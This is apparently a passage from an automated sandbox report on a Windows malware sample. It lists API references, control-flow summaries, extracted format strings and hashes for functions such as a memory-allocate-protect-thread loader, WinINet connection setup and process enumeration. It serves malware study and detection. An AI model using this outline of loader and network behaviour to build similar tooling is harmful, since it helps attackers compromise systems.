                        • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                        • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                        • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00CFE0FC: RevertToSelf.ADVAPI32 ref: 00CFE10A
                        • InternetOpenA.WININET ref: 00CEEB0C
                        • InternetSetOptionA.WININET ref: 00CEEB2C
                        • InternetSetOptionA.WININET ref: 00CEEB44
                        • InternetConnectA.WININET ref: 00CEEB7A
                        • InternetSetOptionA.WININET ref: 00CEEBB7
                        • InternetSetOptionA.WININET ref: 00CEEBE2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$Option$ConnectOpenRevertSelf
                        • String ID:
                        • API String ID: 1513466045-0
                        • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                        • Instruction ID: 213d48b8f6ed84c79f097d72eb16b7555d886a3f190adafa9b81492049f92bc3
                        • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                        • Instruction Fuzzy Hash: A541123520078582EB14EB92F4A5BB9BB62F794B88F00401ADA4A07B26CF3CC917D715

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 237 ceca74-cecbd6 call cf5fec call cf61e8 * 3 call cfb454 call cfb464 * 2 call cfb434 * 2 call cfb454 * 2 call cff284 call cfb434 * 3 call cfb464 call cfc230 call cf34a0 call cfeaa8 * 2 call cef3c0 280 cecbdd-cecbf2 call cfb434 call cef1e4 237->280 281 cecbd8 call cfda74 237->281 287 cecbf9-cecc07 call cef1f8 280->287 288 cecbf4 call cfda74 280->288 281->280 292 cecc0e-cecc15 call cef274 287->292 293 cecc09 call cfda74 287->293 288->287 297 cecc1c-cecc55 call cfb464 call cfb434 call cff284 292->297 298 cecc17 call cfda74 292->298 293->292 306 cecc5c-cecc90 call cfb434 call cfeaa8 call cfb434 call cf5c60 297->306 307 cecc57 call cfda74 297->307 298->297 317 cecebb-cecee7 call cfc218 call cff244 call cfda74 306->317 318 cecc96-cecc9d 306->318 307->306 319 cecca2-cecd24 call cfbfc0 call cff63c call cfbfc0 call cff63c * 2 call cf2ee0 318->319 338 cecd26-cecd2a 319->338 339 cecd44-cecd77 call ceea48 call cfb434 call cee9f4 319->339 340 cecd2e-cecd35 338->340 350 cecd9c-cecd9f 339->350 351 cecd79-cecd87 call cfad44 339->351 340->340 342 cecd37-cecd3a 340->342 342->339 344 cecd3c-cecd3f call cf31f4 342->344 344->339 353 cece26 350->353 354 cecda5-cecdc8 call cf6b98 call cfb434 350->354 358 cecd89-cecd93 call cf8e0c 351->358 359 cecd95-cecd98 351->359 356 cece2c-cece38 call cee9c8 call cef3c0 353->356 369 cecdcf-cecdf0 call cf18c4 call cf5144 call cf4a04 call cef3c0 354->369 370 cecdca 354->370 372 cece3f-cece5d call cfbf04 356->372 373 cece3a call cfda74 356->373 358->350 359->350 398 cecdfa-cece01 369->398 399 cecdf2-cecdf5 call cef484 369->399 370->369 380 cece5f call cfda74 372->380 381 cece64-cece6c 372->381 373->372 380->381 381->317 382 cece6e-cece76 381->382 385 cece78-cece89 382->385 386 cecea4 call cf211c 382->386 388 cece9c 385->388 389 cece8b-cece9a call cef3a0 385->389 395 cecea9-ceceb5 386->395 393 cece9e-cecea0 388->393 389->393 393->386 397 cecea2 393->397 395->317 395->319 397->386 398->356 401 cece03-cece24 call cee9c8 call ceea48 call ceec04 398->401 399->398 401->356
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                        • malloc.LIBCMT ref: 00CECB3B
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CFC230: _time64.LIBCMT ref: 00CFC254
                          • Part of subcall function 00CFC230: malloc.LIBCMT ref: 00CFC29C
                          • Part of subcall function 00CFC230: strtok.LIBCMT ref: 00CFC300
                          • Part of subcall function 00CFC230: strtok.LIBCMT ref: 00CFC311
                          • Part of subcall function 00CF34A0: _time64.LIBCMT ref: 00CF34AE
                          • Part of subcall function 00CFEAA8: malloc.LIBCMT ref: 00CFEAF8
                          • Part of subcall function 00CFEAA8: realloc.LIBCMT ref: 00CFEB07
                          • Part of subcall function 00CEF3C0: GetLocalTime.KERNEL32 ref: 00CEF3DF
                        • malloc.LIBCMT ref: 00CECC4A
                        • _snprintf.LIBCMT ref: 00CECCC1
                        • _snprintf.LIBCMT ref: 00CECCE7
                        • free.LIBCMT ref: 00CECEC6
                          • Part of subcall function 00CFAD44: malloc.LIBCMT ref: 00CFAD78
                          • Part of subcall function 00CFAD44: free.LIBCMT ref: 00CFAF2F
                          • Part of subcall function 00CF8E0C: htonl.WS2_32 ref: 00CF8E3D
                          • Part of subcall function 00CF8E0C: htonl.WS2_32 ref: 00CF8E4A
                        • _snprintf.LIBCMT ref: 00CECD0E
                          • Part of subcall function 00CFDA74: Sleep.KERNEL32 ref: 00CFDABC
                          • Part of subcall function 00CFDA74: ExitThread.KERNEL32 ref: 00CFDAC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                        • String ID:
                        • API String ID: 548016584-0
                        • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                        • Instruction ID: 32ef06cb1b9e28b3f11a31af710c90a349932bed3ebf3dc789975426a31bf481
                        • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                        • Instruction Fuzzy Hash: 16A103203003C942DB58FBB2E9917BE6792EB85780F544039AF1A47796DF38CA06E702

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 415 cef014-cef04f call cef118 WSASocketA 418 cef058-cef097 WSAIoctl 415->418 419 cef051-cef053 415->419 421 cef099-cef0b0 418->421 422 cef0b4-cef0be 418->422 420 cef0f6-cef10a 419->420 421->422 423 cef0eb-cef0ee call d125e8 422->423 424 cef0c0 422->424 429 cef0f4 423->429 425 cef0c5-cef0cf 424->425 427 cef0d6-cef0e2 425->427 428 cef0d1-cef0d4 425->428 427->423 431 cef0e4 427->431 428->427 430 cef0e6 428->430 429->420 430->423 431->425
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: IoctlSocketStartupclosesocket
                        • String ID:
                        • API String ID: 365704328-0
                        • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                        • Instruction ID: ef607c9626c4928d7e227c17ce5c4f253cc2f852fff70c61667afc78a032f798
                        • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                        • Instruction Fuzzy Hash: C92181726047C482DB208F25B58075AB7A5F3887E4F548639EEAD43B89DF39C6568B00

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 432 401595-4015c5 VirtualAlloc 433 4015c7-4015c9 432->433 434 4015e0-40162c call 401563 VirtualProtect CreateThread 433->434 435 4015cb-4015de 433->435 435->433
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: Virtual$AllocCreateProtectThread
                        • String ID:
                        • API String ID: 3039780055-0
                        • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                        • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                        • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                        • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 438 401704-40175c CreateFileA 439 40179c-4017a5 438->439 440 40175e-401760 438->440 441 401781-40178f CloseHandle 440->441 442 401762-40177f ReadFile 440->442 441->439 442->441 443 401791-40179a 442->443 443->440
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleRead
                        • String ID:
                        • API String ID: 1035965006-0
                        • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                        • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                        • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                        • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 444 cef118-cef12a 445 cef14e-cef150 444->445 446 cef12c-cef136 call d125e0 444->446 448 cef1c9-cef1d1 445->448 449 cef152-cef159 445->449 450 cef13c-cef13e 446->450 449->448 451 cef15b-cef1c2 call cfb434 * 2 call cfb454 * 4 449->451 452 cef144 450->452 453 cef1d2-cef1e3 WSACleanup call d00414 450->453 451->448 452->445
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CleanupStartup
                        • String ID:
                        • API String ID: 915672949-0
                        • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                        • Instruction ID: 9b17500ee73f032c61694a9f4aab55fba91f8f500355b41fbb905a12261b217e
                        • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                        • Instruction Fuzzy Hash: 55114430601B8986FB18ABE0F9693746695A740304F40003E97590B3D7DF7E8A56D735

                        Control-flow Graph (image omitted)
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                        • Instruction ID: 069f0ed1dbcdf0ef3c1a2f06b0b77dde42cb96f024babd2cbf270b92fc670b3c
                        • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                        • Instruction Fuzzy Hash: 0B619836219B8486CAA0CB0AE49035AB7A4F7C9B94F548125EFCE83B29DF3DD555CB00

                        Control-flow Graph (image omitted)
                        APIs
                          • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                          • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                          • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                          • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                        • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: Sleep$CountCreateThreadTickmalloc
                        • String ID:
                        • API String ID: 345437100-0
                        • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                        • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                        • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                        • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

                        Control-flow Graph (image omitted)
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction ID: 47bc8141f208b9515026f83a704171a8565f153e07a9c82aeb2017886ed88dfb
                        • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction Fuzzy Hash: D8419776628B8487DB60CB1AE48471BB7A1F7C8B94F105225FADE87B68DB3CD4518F00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                        • String ID: U
                        • API String ID: 3902385426-4171548499
                        • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                        • Instruction ID: c7f84e9296c20871b6d8fd9faf511ad11992e5952b8757a454d5c750279a91e5
                        • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                        • Instruction Fuzzy Hash: EF02147221468186DB20CF69E4843AEB7A1F795B48F584116EB8E83BD8DF3DC855CB30
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00CF8FA0
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF8FD9
                        • Process32First.KERNEL32 ref: 00CF8FFB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                        • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                        • API String ID: 718051232-1833344708
                        • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                        • Instruction ID: b05046fd8401157012b257763ae1a937d9d76a6efde37ad6d47f462ff90443ff
                        • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                        • Instruction Fuzzy Hash: 3D723921B0474886DBE8DB2798507791291F789BC0FA44126EF1F83759EE38CB8AD743
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D02FFD
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D03002
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _fileno.LIBCMT ref: 00D0302F
                          • Part of subcall function 00D05A54: _errno.LIBCMT ref: 00D05A5D
                          • Part of subcall function 00D05A54: _invalid_parameter_noinfo.LIBCMT ref: 00D05A68
                        • write_multi_char.LIBCMT ref: 00D0366B
                        • write_string.LIBCMT ref: 00D03688
                        • write_multi_char.LIBCMT ref: 00D036A5
                        • write_string.LIBCMT ref: 00D03704
                        • write_string.LIBCMT ref: 00D0373B
                        • write_multi_char.LIBCMT ref: 00D0375D
                        • free.LIBCMT ref: 00D03771
                        • _isleadbyte_l.LIBCMT ref: 00D03842
                        • write_char.LIBCMT ref: 00D03858
                        • write_char.LIBCMT ref: 00D03879
                        • _errno.LIBCMT ref: 00D0397C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D03987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID: $@
                        • API String ID: 3318157856-1077428164
                        • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                        • Instruction ID: 90a5206e0a0396b7a789dfe531f3ef538299a81198a0ee4e7bedf08dcfe30204
                        • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                        • Instruction Fuzzy Hash: 5F4227B260868486EB25CF19D54437E7BB8F785794F581106DE8E07BE4DB79CB40CB20
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D02589
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0258E
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _fileno.LIBCMT ref: 00D025BB
                          • Part of subcall function 00D05A54: _errno.LIBCMT ref: 00D05A5D
                          • Part of subcall function 00D05A54: _invalid_parameter_noinfo.LIBCMT ref: 00D05A68
                        • write_multi_char.LIBCMT ref: 00D02BEB
                        • write_string.LIBCMT ref: 00D02C08
                        • write_multi_char.LIBCMT ref: 00D02C25
                        • write_string.LIBCMT ref: 00D02C84
                        • write_string.LIBCMT ref: 00D02CBB
                        • write_multi_char.LIBCMT ref: 00D02CDD
                        • free.LIBCMT ref: 00D02CF1
                        • _isleadbyte_l.LIBCMT ref: 00D02DC2
                        • write_char.LIBCMT ref: 00D02DD8
                        • write_char.LIBCMT ref: 00D02DF9
                        • _errno.LIBCMT ref: 00D02EF3
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D02EFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID:
                        • API String ID: 3318157856-3916222277
                        • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                        • Instruction ID: bfca2a65bede5cca191ee72feb83b7b3ada21d29e692b32de81d5df08f9560f1
                        • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                        • Instruction Fuzzy Hash: 6732463260A69486EB29CF15D58C3BE7BB4F745794F281006DE8E17AE8DB78C940CB70
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A523FD
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A52402
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _fileno.LIBCMT ref: 00A5242F
                          • Part of subcall function 00A54E54: _errno.LIBCMT ref: 00A54E5D
                          • Part of subcall function 00A54E54: _invalid_parameter_noinfo.LIBCMT ref: 00A54E68
                        • write_multi_char.LIBCMT ref: 00A52A6B
                        • write_string.LIBCMT ref: 00A52A88
                        • write_multi_char.LIBCMT ref: 00A52AA5
                        • write_string.LIBCMT ref: 00A52B04
                        • write_string.LIBCMT ref: 00A52B3B
                        • write_multi_char.LIBCMT ref: 00A52B5D
                        • free.LIBCMT ref: 00A52B71
                        • _isleadbyte_l.LIBCMT ref: 00A52C42
                        • write_char.LIBCMT ref: 00A52C58
                        • write_char.LIBCMT ref: 00A52C79
                        • _errno.LIBCMT ref: 00A52D7C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A52D87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID: $@
                        • API String ID: 3318157856-1077428164
                        • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                        • Instruction ID: 12e9f70891ca004c3d53ea6b50c067b8f3660ae22ecfabf3e72a788cb115e911
                        • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                        • Instruction Fuzzy Hash: B142257370868486EB29CF69D5443BE7BB0F787796F281015DF4A57AA8DB38C948CB01
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A51989
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5198E
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _fileno.LIBCMT ref: 00A519BB
                          • Part of subcall function 00A54E54: _errno.LIBCMT ref: 00A54E5D
                          • Part of subcall function 00A54E54: _invalid_parameter_noinfo.LIBCMT ref: 00A54E68
                        • write_multi_char.LIBCMT ref: 00A51FEB
                        • write_string.LIBCMT ref: 00A52008
                        • _errno.LIBCMT ref: 00A522F3
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A522FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                        • String ID: -$0
                        • API String ID: 3246410048-417717675
                        • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                        • Instruction ID: 1bc2377888ae09ea78862b305734addde8407ae7f9ccdd2dd88c1e36aa400a8b
                        • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                        • Instruction Fuzzy Hash: 55324573708A8486EB29CF19D5443BE7BB0F746B86F245116DF4A47AA8DB39C94CCB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                        • String ID: U
                        • API String ID: 3902385426-4171548499
                        • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                        • Instruction ID: f2896f628be13ac30ef92d4e9eeeaee73062e311eec2a66dfa7590927d6340cd
                        • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                        • Instruction Fuzzy Hash: 48021E32B14B8186DB208F39E49436ABBB1F785B9AF544116EF8A83B54DB3DC54DCB10
                        APIs
                        • _snprintf.LIBCMT ref: 00CF7D66
                        • _snprintf.LIBCMT ref: 00CF7D83
                        • _snprintf.LIBCMT ref: 00CF7CA5
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • _snprintf.LIBCMT ref: 00CF7FD8
                        • _snprintf.LIBCMT ref: 00CF8334
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                        • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                        • API String ID: 3442832105-1222817042
                        • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                        • Instruction ID: 86ee277ffcf12d965975090fdd930f6e4eb6eda1509887c8b1ac8b2692ee8fe0
                        • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                        • Instruction Fuzzy Hash: A432D962614E8992DB558F6DE0012F9B3B0FF98799F446201EF8917B21EF38D2A7D341
                        APIs
                        • malloc.LIBCMT ref: 00CF1C63
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
